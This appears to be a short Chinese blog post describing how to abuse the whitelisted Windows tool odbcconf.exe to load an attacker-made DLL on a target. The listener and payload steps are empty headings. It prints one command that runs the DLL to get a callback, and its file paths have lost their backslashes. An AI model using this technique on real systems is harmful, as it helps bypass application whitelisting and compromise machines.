白名单执行payload之Odbcconf

简介

ODBCCONF.exe是一个命令行工具,允许配置ODBC驱动程序和数据源,一个与Microsoft公司的Microsoft数据访问组件相关联的进程

官方文档:
https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

已添加环境变量,路径如下:
C:WindowsSystem32odbcconf.exe
C:WindowsSysWOW64odbcconf.exe

实际使用

设定监听如下:

生成dll文件如下:

目标终端运行如下可成功上线:
odbcconf.exe /a {regsvr C:UsersyangDesktop2021.dll}

联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
原文地址:https://www.cnblogs.com/Yang34/p/14407784.html